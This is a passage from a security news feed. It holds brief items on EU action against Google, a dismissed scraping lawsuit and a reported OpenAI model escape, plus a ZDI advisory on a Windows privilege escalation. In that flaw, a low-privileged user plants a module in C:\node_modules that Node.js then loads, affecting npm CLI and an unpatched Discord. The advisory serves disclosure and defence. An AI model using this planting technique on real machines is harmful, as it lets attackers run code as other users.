<p class="wp-block-paragraph">Now Google must give third-party services featuring in its results the same treatment as its own services, and allow developers of apps in the Play Store to communicate about offers both in and outside the Play Store, or face further fines.</p>



<p class="wp-block-paragraph">The Commission first <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_25_811" target="_blank" rel="noreferrer noopener">raised these issues with Google in March 2025</a>. In April of this year, <a href="https://www.computerworld.com/article/4159968/google-should-share-search-data-to-break-its-monopoly-european-commission-suggests.html">the Commission laid out</a> plans as to how Google should allow other third-parties to share its searches, suggestions that the tech firm firmly resisted. Earlier this month, the Commission also said <a href="https://www.computerworld.com/article/4198420/google-must-open-android-to-rival-ai-agents-eu-orders.html"> Android should be open to other AI agents</a> and not limited to Google’s own Gemini.</p>



<p class="wp-block-paragraph">Google is not the only US company to have fallen foul of the DMA. In April 2025, <a href="https://www.macworld.com/article/2762151/eu-fines-apple-e500m-570m-for-violations-of-the-digital-markets-act.html">Apple was fined €500 million</a> for breaching the Act and, last month, <a href="https://www.computerworld.com/article/4190069/eu-microsoft-and-amazons-cloud-services-should-probably-be-classified-as-gatekeepers.html">the Commission fired the first shots at cloud hyperscalers</a> Microsoft and Amazon.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google’s anti-search-scraping lawsuit dismissed]]></title>
<description><![CDATA[A court has dismissed Google’s case against SerpApi over that company’s scraping of search results to train AI models.



The US District Court for the Northern District of California found that there was no indication that any copyright had been breached.



Google announced in December that it ...]]></description>
<link>https://tsecurity.de/de/3694764/ai-nachrichten/googles-anti-search-scraping-lawsuit-dismissed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694764/ai-nachrichten/googles-anti-search-scraping-lawsuit-dismissed/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:05 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A court has dismissed <a href="https://storage.courtlistener.com/recap/gov.uscourts.cand.461513/gov.uscourts.cand.461513.42.0.pdf" target="_blank" rel="noreferrer noopener">Google’s case against SerpApi</a> over that company’s scraping of search results to train AI models.</p>



<p class="wp-block-paragraph">The US District Court for the Northern District of California found that there was no indication that any copyright had been breached.</p>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4111155/google-says-no-to-training-ai-on-its-search-results.html">Google announced in December</a> that it was suing SerpApI for its alleged web scraping, claiming that it was protecting copyright holders. In February<a href="https://www.computerworld.com/article/4136288/serpapi-fights-back-against-google-lawsuit.html">, SerpApI fought back and asked the court</a> to dismiss Google’s case. And this week, Judge Yvonne Gonzalez Rogers agreed with SerpApi that Google’s case has no merit.</p>



<p class="wp-block-paragraph">Google’s argument was that SerpApi’s actions breached the US Digital Millennium Copyright Act (DCMA). It made two claims: first, that no person shall circumvent a technological measure that effectively controls access to a work protected under this title, and second that no person shall manufacture, import, offer to the public, provide, or otherwise traffic in any technology, product, service, device, or component protected by the Act.</p>



<p class="wp-block-paragraph">SerpApi claimed that the URLs and other links that were being served by Google did not in themselves entail copyright and the judge agreed. In her judgment, she said that there was no indication that the copyright holders had authorized Google to take action against SerpApi.</p>



<p class="wp-block-paragraph">The case is not completely over as the judge has given Google 21 days to amend its complaint to demonstrate that it was acting on behalf of the copyright owners. It remains to be seen whether its war against the web scrapers is finally over.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[As White House monitors latest OpenAI incident, Congress eyes an AI ‘kill switch’ for DHS]]></title>
<description><![CDATA[The White House is monitoring developments after OpenAI revealed earlier this week that one of the company’s AI systems went beyond its intended parameters during a security test and managed to hack into the infrastructure of the AI platform Hugging Face. According to Reuters, presidential techno...]]></description>
<link>https://tsecurity.de/de/3694763/ai-nachrichten/as-white-house-monitors-latest-openai-incident-congress-eyes-an-ai-kill-switch-for-dhs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694763/ai-nachrichten/as-white-house-monitors-latest-openai-incident-congress-eyes-an-ai-kill-switch-for-dhs/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:04 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The White House is monitoring developments after OpenAI revealed earlier this week that one of the company’s AI systems <a href="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html" data-type="link" data-id="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html" target="_blank">went beyond its intended parameters during a security test</a> and managed to hack into the infrastructure of the AI platform Hugging Face. <a href="https://www.reuters.com/legal/litigation/ai-kill-switch-bill-floated-by-us-house-lawmakers-2026-07-23/" target="_blank" rel="noreferrer noopener">According to Reuters</a>, presidential technology advisor Michael Kratsios has been briefed on the incident.</p>



<p class="wp-block-paragraph">The OpenAI model escape also prompted a group of Republican and Democratic members of the House of Representatives to introduce two new bills. One, called the AI Kill Switch Act, would give the US Department of Homeland Security (DHS) the authority to order companies to shut down AI models deemed to pose a risk to human life or the US economy.</p>



<p class="wp-block-paragraph">The other measure would require developers of the most advanced AI models to undergo independent security reviews before the systems are put into use.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Node.js Trust Falls: Dangerous Module Resolution on Windows]]></title>
<description><![CDATA[In September of 2024, ZDI received a vulnerability submission from an anonymous researcher affecting npm CLI that revealed a fundamental design issue in Node.js. This blog details how it continues to expose applications to local privilege escalation (LPE) attacks on Windows systems, including the...]]></description>
<link>https://tsecurity.de/de/3694571/hacking/nodejs-trust-falls-dangerous-module-resolution-on-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694571/hacking/nodejs-trust-falls-dangerous-module-resolution-on-windows/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:58 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">In September of 2024, ZDI received a vulnerability submission from an anonymous researcher affecting <a href="https://docs.npmjs.com/cli/v11">npm CLI</a> that revealed a fundamental design issue in <a href="https://nodejs.org/en">Node.js</a>. This blog details how it continues to expose applications to local privilege escalation (LPE) attacks on Windows systems, including the Discord desktop app (CVE-2026-0776 0-Day), which remains unpatched and vulnerable.</p>





















  
  



<p>The issue is straightforward: when Node.js resolves modules, the runtime searches for packages in <code>C:\node_modules</code> as part of its default behavior. Since low-privileged Windows users can create this directory and plant malicious modules there, any Node.js application with missing or optional dependencies becomes vulnerable to privilege escalation.</p>




  <p class="">This issue is not new. Concerned discussions about Node.js's module search path behavior date back to <a href="https://groups.google.com/g/nodejs/c/5BGr5dliUIk/m/abJEH3sPymcJ">2013</a> and <a href="https://github.com/nodejs/node-v0.x-archive/issues/8830">2014</a>.</p><p class="">Node.js has explicitly <a href="https://github.com/nodejs/node/security/policy#uncontrolled-search-path-element-cwe-427">stated</a> that they consider this behavior intentional: </p><p class="">"Node.js trusts the file system." </p><p class="">They do not treat CWE-427 (Uncontrolled Search Path Element) as a vulnerability, pushing responsibility onto application developers. </p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png" data-image-dimensions="866x438" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=1000w" width="866" height="438" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
          
          <figcaption data-sqsp-image-classic-block-caption-container class="image-caption-wrapper">
            <p data-rte-preserve-empty="true"><em>Figure 1: The vendor’s security policy stance on CWE-427 as a non-issue</em></p>
          </figcaption>
        
      
        </figure>
      

    
  


  





  <p class="">As the case studies below demonstrate, this stance has dangerous consequences. Developers are largely unaware of this attack surface, and the result is a proliferation of exploitable applications. We will show examples in npm CLI and Discord, but there are likely many more applications that are impacted by this.</p><p class=""><strong>Root Cause</strong></p><p class="">The root cause lies in the way Node.js performs module resolution. This is documented <a href="https://nodejs.org/api/modules.html#loading-from-node-modules-folders">here.</a> Although UNIX paths are used in the documentation provided by Node.js, the same logic is applied on Windows.</p>





















  
  



<p>When a Node.js application calls require(‘bar’), the runtime searches for the module in the following order:  </p>
<ol>
<li>   C:\Users\Administrator\projects\node_modules\bar.js</li>
<li>   C:\Users\Administrator\node_modules\bar.js</li>
<li>   C:\Users\node_modules\bar.js</li>
<li>   C:\node_modules\bar.js              &lt;-- The problem</li>
</ol>
<p>If the legitimate package is missing, whether due to optional dependencies, development packages removed in production, or installation failures, the resolution search will eventually reach the root of the drive. Any user can create <code>C:\node_modules</code> and place a malicious package there. Once the low-privileged user has populated <code>C:\node_modules\bar.js</code>, Node.js will load and execute it in the context of the current user. In the following case studies, we will provide evidence of how, despite properly following NPM’s <a href="https://docs.npmjs.com/cli/v11/configuring-npm/package-json#optionaldependencies">guidelines</a>, third-party dependencies end up triggering this vulnerability anytime you launch the application.   </p>
<p><b data-preserve-html-node="true">Case Studies: Real-World Manifestations</b>  </p>
<p>The Optional Dependency Pattern:
npm supports optional dependencies to be specified in the project’s package.json file. The <a href="https://docs.npmjs.com/cli/v11/configuring-npm/package-json#optionaldependencies">recommended pattern</a> for checking for these dependencies is as follows:</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png" data-image-dimensions="1051x756" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=1000w" width="1051" height="756" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
          
          <figcaption data-sqsp-image-classic-block-caption-container class="image-caption-wrapper">
            <p data-rte-preserve-empty="true"><em>Figure 2: npm Docs showing optionalDependencies example code      </em></p>
          </figcaption>
        
      
        </figure>
      

    
  


  


<p>This pattern silently catches errors when optional packages are missing, allowing execution to continue. So what’s the problem? On Windows, Node.js will search all the way up to <code>C:\node_modules</code> where an attacker may have planted a malicious replacement. This search behavior mirrors UNIX conventions where <code>/node_modules</code> at the filesystem root is typically only writable by root. Windows systems by default allow any user to create <code>C:\node_modules</code>. Once <code>require</code> is called, Node.js will traverse the search path and execute any matching module it finds.  </p>
<p>Important things to note:  </p>
<ol>
<li>   This pattern can be found in third party libraries deep in a dependency tree, as we will see in the following examples.  </li>
<li>   There is no runtime indication to either the developers or the end users that such a vulnerability exists without looking at the filesystem logs with Procmon.  </li>
<li>   The optional dependency pattern itself would not be dangerous if Node.js did not search for packages in <code>C:\node_modules</code>.</li>
</ol>
<p>Let’s take a deeper look at both cases and see why this is so dangerous.  </p>
<p><b data-preserve-html-node="true">Case 1: npm CLI (ZDI-26-043 / ZDI-CAN-25430 / CVE-2026-0775)</b>. </p>
<p>Prior to version 11.2.0, npm CLI used a library called “promise-inflight”, which contained an optional dependency on a package called “bluebird”. </p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png" data-image-dimensions="926x517" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=1000w" width="926" height="517" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
          
          <figcaption data-sqsp-image-classic-block-caption-container class="image-caption-wrapper">
            <p data-rte-preserve-empty="true"><em>Figure 3: npm CLI repo </em><a href="https://github.com/npm/cli/blob/977fd5784f875fdc2e3436ed15c444ddca63e3d7/node_modules/promise-inflight/inflight.js#L6"><em>snippet</em></a><em> </em><a href="https://github.com/npm/cli/blob/977fd5784f875fdc2e3436ed15c444ddca63e3d7/node_modules/promise-inflight/inflight.js#L6"><em>showing</em></a><em> require call for missing bluebird package dependency</em></p>
          </figcaption>
        
      
        </figure>
      

    
  


  


<p>When Node.js is installed on the system, npm is included by default without the <code>bluebird</code> package.  This vulnerability was introduced when bluebird was removed through a well-intentioned pull request (<a href="https://github.com/npm/cli/pull/1438/changes">https://github.com/npm/cli/pull/1438/changes</a>), demonstrating how easy it is for developers to unknowingly create this attack surface.</p>
<p>We can see Node’s package resolution logic at work in the screenshot below:</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png" data-image-dimensions="1007x497" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=1000w" width="1007" height="497" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
          
          <figcaption data-sqsp-image-classic-block-caption-container class="image-caption-wrapper">
            <p data-rte-preserve-empty="true"><em>Figure 4: Procmon log showing the package resolution behavior of Node.js via CVE-2026-0775</em></p>
          </figcaption>
        
      
        </figure>
      

    
  


  


<p>First, the application looks for the <code>bluebird.js</code> package in the Node.js installation directory. Node.js sequentially searches back to the system root until it finds the package. If an attacker has placed <code>C:\node_modules\bluebird.js</code>, the <code>require</code> call will find, read, and execute the malicious payload in the context of any user running npm on the system. </p>
<p>This vulnerability is especially dangerous because it is triggered when many <code>npm *</code> cli commands are used. Common development commands such as <code>npm install</code>, <code>npm –l</code>, and <code>npm prune</code> will all execute the malicious <code>bluebird.js</code>package.</p>
<p><b data-preserve-html-node="true">Case 2: Discord (ZDI-26-040/ ZDI-CAN-27057 / CVE-2026-0776/ UNPATCHED)</b></p>
<p>On April 22, 2025, ZDI received a report for a similar vulnerability in Discord reported by T. Doğa Gelişli. Discord uses the ws WebSocket library, which contains an optional dependency on utf-8-validate for compatibility with older Node.js versions:</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png" data-image-dimensions="1662x798" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=1000w" width="1662" height="798" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
          
          <figcaption data-sqsp-image-classic-block-caption-container class="image-caption-wrapper">
            <p data-rte-preserve-empty="true">Figure 5: websockets library repo snippet showing require call for missing utf-8-validate package dependency</p>
          </figcaption>
        
      
        </figure>
      

    
  


  


<p>Discord does not ship with the utf-8-validate package. As a result, the following Procmon logs show the same behavior as Case 1. Anytime Discord is launched, the attacker controlled <code>C:\node_modules\utf-8-validate.js</code> is executed.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png" data-image-dimensions="1074x528" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=1000w" width="1074" height="528" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2c563913-8390-46a3-aa48-5dcc755c7d4a/Capture.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
          
          <figcaption data-sqsp-image-classic-block-caption-container class="image-caption-wrapper">
            <p data-rte-preserve-empty="true">Figure 6: Procmon log showing the package resolution behavior of Node.js via CVE-2026-0776</p>
          </figcaption>
        
      
        </figure>
      

    
  


  


<p>The ws library does support disabling this check via the <code>WS_NO_UTF_8_VALIDATE</code> environment variable, but this requires the consuming application (Discord) to set it explicitly. Here’s a quick video demonstrating the bug by popping the calc app when opening Discord:</p>


  














  
    
      
    
    
      
        
          
          
        
      
      
      



    
  








  <p class="">Discord automatically opens on login by default, so in practice code execution happens immediately without any user interaction. Strangely, the Discord Security team made it clear to us in their responses that they do not consider local attack vectors as valid security issues. </p><p class=""><strong>The Bigger Picture</strong></p><p class="">The cases above represent only a few of the applications affected by this pattern. During our investigation we found many other independent reports.  These issues in <a href="https://jira.mongodb.org/browse/COMPASS-9058">Mongo DB Compass</a> and <a href="https://jira.mongodb.org/browse/MONGOSH-2028">Mongo DB Shell</a> are just two other examples.</p><p class="">Every Windows application built on Node.js with missing or optional dependencies is potentially vulnerable. This includes desktop applications that utilize Electron as well as popular web frameworks such as Next.js and React.</p><p class="">Each vendor has clearly stated that they will not treat these issues as vulnerabilities: </p><p class="">NPM’s response to our report: </p><p class=""><em>“exploits that require local access to a machine are considered ineligible for npm CLI</em></p><p class="">Discord’s response to our report:</p><p class=""><em>“We do not consider physical/local attacks as valid security issues”</em></p><p class="">Node.js, in the “Examples of non-vulnerabilities” section of their <a href="https://github.com/nodejs/node/security/policy#examples-of-non-vulnerabilities">Security Policy</a>: </p><p class=""><em>“Node.js trusts the file system in the environment accessible to it. Therefore, it is not a vulnerability if it accesses/loads files from any path that is accessible to it.” </em></p><p class=""><strong>Conclusion</strong></p>





















  
  



<p>The vulnerability pattern described in this blog stems from a deliberate design decision by Node.js maintainers. While Node.js's position that “applications should trust their filesystem” may hold true on properly administered UNIX systems, it creates a systemic vulnerability on Windows where low-privileged users can write to <code>C:\node_modules</code>. Without a fix from Node.js, the burden silently falls on application developers.   </p>
<p>Making matters worse, the vulnerable code may not live in the application code itself. The optional dependencies that trigger this behavior could come from third-party libraries buried in the dependency tree as we saw with both Discord and npm CLI. </p>




  <p class="">We encourage security researchers to further review this issue and investigate other applications for this dangerous behavior. You can find us online at <a href="https://x.com/bobbygould5">@bobbygould5</a> and <a href="https://x.com/izobashi">@izobashi</a>, and follow the team on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, or <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a> for the latest in exploit techniques and security patches.</p><p class=""> </p><p class="">DISCLOSURE TIMELINES</p><p class=""> </p><p class="">NPM CLI: </p><p class="">2024-11-13 – ZDI submitted the report to the vendor</p><p class="">2024-11-13 – The vendor acknowledged the receipt of the report</p><p class="">2024-11-13 – The vendor communicated that the reported behavior was by design and they do not consider local attacks as valid security issues</p><p class="">2025-08-05 – ZDI encouraged the vendor to re-assess the issue</p><p class="">2025-12-18 – ZDI notified the vendor of the intention to publish the case as a 0-day advisory</p><p class=""> </p><p class="">DISCORD: </p><p class="">2025-07-08 – ZDI notified vendor </p><p class="">2025-09-11 – ZDI followed up with vendor </p><p class="">2025-09-15 – Vendor stated they do not consider local attacks as valid security issues </p><p class="">2025-12-01 – ZDI explained why we believe the issue is still valid </p><p class="">2025-12-10 – Vendor replied that the vulnerability is still out of scope  </p><p class="">2025-12-11 – ZDI informed vendor of intent to publish 0-day  </p><p class="">  </p><p class="">REFERENCES</p><p class=""><a href="https://nodejs.org/api/modules.html#loading-from-node_modules-folders">https://nodejs.org/api/modules.html#loading-from-node_modules-folders</a></p><p class=""><a 